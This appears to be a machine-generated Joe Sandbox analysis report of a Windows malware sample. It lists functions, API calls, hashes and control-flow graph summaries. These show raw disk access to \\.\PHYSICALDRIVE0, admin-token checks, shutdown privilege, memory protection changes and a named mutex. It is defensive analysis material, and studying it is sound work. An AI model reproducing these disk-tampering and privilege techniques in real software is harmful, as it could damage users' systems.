                                                                                                                                                                      • Opcode ID: 74dd183bfbc60cce3caee40a229eb83cba66efea863e32e52d49e009b086718c
                                                                                                                                                                      • Instruction ID: 6885a5c3f576ce6d6f9b2f3c688c14414178aeb406d1450dcc701d4c4953fbe4
                                                                                                                                                                      • Opcode Fuzzy Hash: 74dd183bfbc60cce3caee40a229eb83cba66efea863e32e52d49e009b086718c
                                                                                                                                                                      • Instruction Fuzzy Hash: 88F0A4F280030866CB10EB70DC46FDA33389B14305F0045BAB609B60C2EE7997C88AAD
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004069BB Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 213 4069bb-4069df call 404b1d * 2 218 40a530-40a534 213->218 219 402b51-402b55 218->219 220 40a536-40a547 LoadLibraryA 218->220 221 40a54d-40a54e 220->221 222 40beae-40beb9 call 404873 220->222 221->222 222->218
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,00F1B4B0,?,8B6DF01F,?), ref: 0040A53E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                      • Opcode ID: f586a6cd2cf2dbeeef7eea32102fec9f33a1a5ead16db59af31ba7ceb6fdb687
                                                                                                                                                                      • Instruction ID: df007bf62870af7b74df0dbbe881ec21055e906183b30cdd37e1bfed71aa1605
                                                                                                                                                                      • Opcode Fuzzy Hash: f586a6cd2cf2dbeeef7eea32102fec9f33a1a5ead16db59af31ba7ceb6fdb687
                                                                                                                                                                      • Instruction Fuzzy Hash: 6FE0EC631002087AD7102995DC46FE7765DD7C83A9F508432F705E61D1D63DD95092AE
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00401352 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,30DBCA36), ref: 0040139E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                      • Opcode ID: 23b8f15108349a094178a66cda89c25afec04ff88fbbd6386f4d34c7ae965c1b
                                                                                                                                                                      • Instruction ID: a34d84a8aa74edc03bf23277289f2878ef58b524965e171c6cbb9bf5a1c13c13
                                                                                                                                                                      • Opcode Fuzzy Hash: 23b8f15108349a094178a66cda89c25afec04ff88fbbd6386f4d34c7ae965c1b
                                                                                                                                                                      • Instruction Fuzzy Hash: 6EF01276C0020CFFCF01AFA5C995CADBF75FF08204B0484AEF90426162DB369A24EB04
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040A554 Relevance: 1.5, APIs: 1, Instructions: 28libraryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 239 40a554-40a55a 240 40a536-40a547 LoadLibraryA 239->240 241 40a55c-40a55e 239->241 242 40beae-40beb9 call 404873 240->242 243 40a54d-40a54e 240->243 241->242 242->240 247 402b51-402b55 242->247 243->242
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,00F1B4B0,?,8B6DF01F,?), ref: 0040A53E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                                      • Opcode ID: e49d5435ce23adc9ba57d6308fbfbf1d6f88da9ad89fc2230d2c21acb333a382
                                                                                                                                                                      • Instruction ID: 523668955e0e2244aa789caa92f6427d01868abc63ade59164da16a1192ab317
                                                                                                                                                                      • Opcode Fuzzy Hash: e49d5435ce23adc9ba57d6308fbfbf1d6f88da9ad89fc2230d2c21acb333a382
                                                                                                                                                                      • Instruction Fuzzy Hash: A5E0D831004604ADCB11DE58EC8EBDA7298D705311F6498339906FD581CB3CDA85859F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040135E Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 232 40135e-401365 233 40136b-4013a6 call 404873 call 404b1d VirtualProtect 232->233 234 401366 call 403d7b 232->234 234->233
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00000000,30DBCA36), ref: 0040139E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                      • Opcode ID: fe7d76ad10c6a880bf5e1dfd2e6ced56b71b8bba822c6e1022d11efbb5b05653
                                                                                                                                                                      • Instruction ID: c3339b175f8b132734afde4b87bcd326777cd273dbfa93b5593f16fc1374389e
                                                                                                                                                                      • Opcode Fuzzy Hash: fe7d76ad10c6a880bf5e1dfd2e6ced56b71b8bba822c6e1022d11efbb5b05653
                                                                                                                                                                      • Instruction Fuzzy Hash: 3DF0F876C0020CBFCF01AFA5D955C9DBFB9FF48200F0084AEB91466162D7369A20AB54
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00408958 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
                                                                                                                                                                      • DeviceIoControl.KERNEL32(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ControlCreateDeviceFile
                                                                                                                                                                      • String ID: \\.\C:$\\.\PHYSICALDRIVE0
                                                                                                                                                                      • API String ID: 107608037-2160117148
                                                                                                                                                                      • Opcode ID: 320e27fcbf62a17e998bc26e42cf0c1a2d27fdc4df0059520f6dda202d1693b9
                                                                                                                                                                      • Instruction ID: 6179182b2b83b9443c5bd9d33f461fa1aeab268a59a3a7b7debce46551af33e6
                                                                                                                                                                      • Opcode Fuzzy Hash: 320e27fcbf62a17e998bc26e42cf0c1a2d27fdc4df0059520f6dda202d1693b9
                                                                                                                                                                      • Instruction Fuzzy Hash: AF216D38640348EFD718CF68ED45F99BBB4EB48701F10C1AAE905AB3E1D6B49B40CB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040895B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
                                                                                                                                                                      • DeviceIoControl.KERNEL32(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ControlCreateDeviceFile
                                                                                                                                                                      • String ID: \\.\C:$\\.\PHYSICALDRIVE0
                                                                                                                                                                      • API String ID: 107608037-2160117148
                                                                                                                                                                      • Opcode ID: 6e1c8ed08f6fcb21cf0fed49fef2ed80236c62ed62855b81c13f5c76d91f0969
                                                                                                                                                                      • Instruction ID: 711083b2bbb86b7d36e7a7c78397dedf6b4307ebbdc5261e1e4f3fe33cb2826c
                                                                                                                                                                      • Opcode Fuzzy Hash: 6e1c8ed08f6fcb21cf0fed49fef2ed80236c62ed62855b81c13f5c76d91f0969
                                                                                                                                                                      • Instruction Fuzzy Hash: 6F215C38600308AFD718CF58DC46F99BBB4AB48701F10C0AAE905AB3E1D6B4AA40CB58
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00408951 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56fileCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileA.KERNEL32(\\.\C:,00000000,00000003,00000000,00000003,00000000,00000000), ref: 00408972
                                                                                                                                                                      • DeviceIoControl.KERNEL32(?,00560000,00000000,00000000,?,00000020,?,00000000), ref: 00408994
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ControlCreateDeviceFile
                                                                                                                                                                      • String ID: \\.\C:$\\.\PHYSICALDRIVE0
                                                                                                                                                                      • API String ID: 107608037-2160117148
                                                                                                                                                                      • Opcode ID: 43b5c774c06db54b38c673015130514d13990ffabb50efddd8f557c0ac6fe542
                                                                                                                                                                      • Instruction ID: 389e508c5a35674a8dec956cf5ed0ace9ff19c3110c7d277eeff61c57732489a
                                                                                                                                                                      • Opcode Fuzzy Hash: 43b5c774c06db54b38c673015130514d13990ffabb50efddd8f557c0ac6fe542
                                                                                                                                                                      • Instruction Fuzzy Hash: 79216D78604348EFD708CF58E855BA9BBB4EB48711F10C1AAE905AB3E1D7B49B40CB59
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004082B6 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 00404845
                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 004082F8
                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 0040AA9C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3429775523-0
                                                                                                                                                                      • Opcode ID: a4effce1087fb57fd00f7ec72273620cf91c437d6a0f92fe25e66b5b43bbe758
                                                                                                                                                                      • Instruction ID: 1502378442f3bba6843c10e462c5ea7b9d530f023e777048d123248eda5abe90
                                                                                                                                                                      • Opcode Fuzzy Hash: a4effce1087fb57fd00f7ec72273620cf91c437d6a0f92fe25e66b5b43bbe758
                                                                                                                                                                      • Instruction Fuzzy Hash: C9014470A04348FAEB10DBE4C948BEEBFB8AB15705F008499E101BA1C1D3B89B04DB66
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040B453 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,0004D004,?,00000000,?,00000000,00000000,00000000), ref: 0040B613
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ControlDevice
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2352790924-0
                                                                                                                                                                      • Opcode ID: a18e5d1472410fca8ca710374cb3d90e60d246b078c147aac9527c84940cfddb
                                                                                                                                                                      • Instruction ID: 4278b43e27663415cba18f20cd4f792bdb1a65b806582fdca38cb5ba5a4c1545
                                                                                                                                                                      • Opcode Fuzzy Hash: a18e5d1472410fca8ca710374cb3d90e60d246b078c147aac9527c84940cfddb
                                                                                                                                                                      • Instruction Fuzzy Hash: 5D515B75A04244DFEB08CF98C590BAABBB2EF94304F2881E9D9015B387C675EE41DB91
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040D1F6 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 169libraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040AEB6,?,?,004046B5), ref: 0040D1FE
                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0040D336
                                                                                                                                                                      • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040D3A8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad$HandleModule
                                                                                                                                                                      • String ID: advapi32.dll$kernel32.dll$ntdll.dll
                                                                                                                                                                      • API String ID: 2593893887-1356967432
                                                                                                                                                                      • Opcode ID: 77f18392bb993366c1df7b453053b3aeb51cb4a2013aefc10122c1c1374fb3f4
                                                                                                                                                                      • Instruction ID: ca720bcfbdb204521244a6d16e88fbee784b87e4b750a5d7fd7297a05bd30f3d
                                                                                                                                                                      • Opcode Fuzzy Hash: 77f18392bb993366c1df7b453053b3aeb51cb4a2013aefc10122c1c1374fb3f4
                                                                                                                                                                      • Instruction Fuzzy Hash: DC511DF2D10210EFD304BFA1BCC28393AB5E649305744457FF985A72A1F6B9A9448B6B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004023F2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 82libraryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00402404
                                                                                                                                                                      • LoadLibraryA.KERNEL32(NTDLL.DLL), ref: 004024D2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                                      • String ID: NTDLL.DLL$SeShutdownPrivilege$advapi32.dll
                                                                                                                                                                      • API String ID: 1029625771-2471717051
                                                                                                                                                                      • Opcode ID: e654aa5178626686adecf490f11625747cc8277270b74630ebdda96dc98469bc
                                                                                                                                                                      • Instruction ID: 3c0ce9a7761a6e63309c521fc4ca6a6d9466e377a545f21450368ef7aac56ae8
                                                                                                                                                                      • Opcode Fuzzy Hash: e654aa5178626686adecf490f11625747cc8277270b74630ebdda96dc98469bc
                                                                                                                                                                      • Instruction Fuzzy Hash: F13146B1E10209EBDB04DFE0CD46BEEBB74EB44701F20416AF501B66C0E7795A44CBA5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00405312 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlNtStatusToDosError.NTDLL(C0000023), ref: 004037E8
                                                                                                                                                                      • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 004037EF
                                                                                                                                                                      • RtlInitUnicodeString.NTDLL(?,00007FFD), ref: 00408342
                                                                                                                                                                      • RtlExpandEnvironmentStrings_U.NTDLL(00000000,?,?,00000000), ref: 00408372
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Error$EnvironmentExpandInitLastRestoreStatusStringStrings_UnicodeWin32
                                                                                                                                                                      • String ID: #
                                                                                                                                                                      • API String ID: 4202685462-1885708031
                                                                                                                                                                      • Opcode ID: d2950aec320787fbfdd949c7a338a73876b2f1d301fb6a4be3977a861f702f93
                                                                                                                                                                      • Instruction ID: 2625ad76528c3a05819e41784e94355af3192e6a8ec1aace2841fc774e878e1c
                                                                                                                                                                      • Opcode Fuzzy Hash: d2950aec320787fbfdd949c7a338a73876b2f1d301fb6a4be3977a861f702f93
                                                                                                                                                                      • Instruction Fuzzy Hash: D5115175D14209EFDB14DFE4C984AAEBB79EF08301F10856AE915B32C0EB789705CB56
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004050A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlInitUnicodeString.NTDLL(?,00550000), ref: 004050CC
                                                                                                                                                                      • RtlInitUnicodeString.NTDLL(?,explorer.exe), ref: 004050DE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InitStringUnicode
                                                                                                                                                                      • String ID: explorer.exe
                                                                                                                                                                      • API String ID: 4228678080-3187896405
                                                                                                                                                                      • Opcode ID: 7d548acef704560823f98ce8b990f017fce1fd689d344c9a11bc31deb3c59b97
                                                                                                                                                                      • Instruction ID: 050ed0569a6514cfdb40d37d4b6a842c1993e2635d6f26a1999b978f90a0d4ff
                                                                                                                                                                      • Opcode Fuzzy Hash: 7d548acef704560823f98ce8b990f017fce1fd689d344c9a11bc31deb3c59b97
                                                                                                                                                                      • Instruction Fuzzy Hash: BAF09074204248EFCB04CF54C880E6ABBA6FB49304F20855AFC0597381C674ED91CB9A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00403AEE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15synchronizationCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateMutexW.KERNEL32(00000000,00000000,jmuZVxzUSQKZJ,?,?,004044C1,?,?,004046B5), ref: 00403AFB
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,004044C1,?,?,004046B5), ref: 00403B06
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
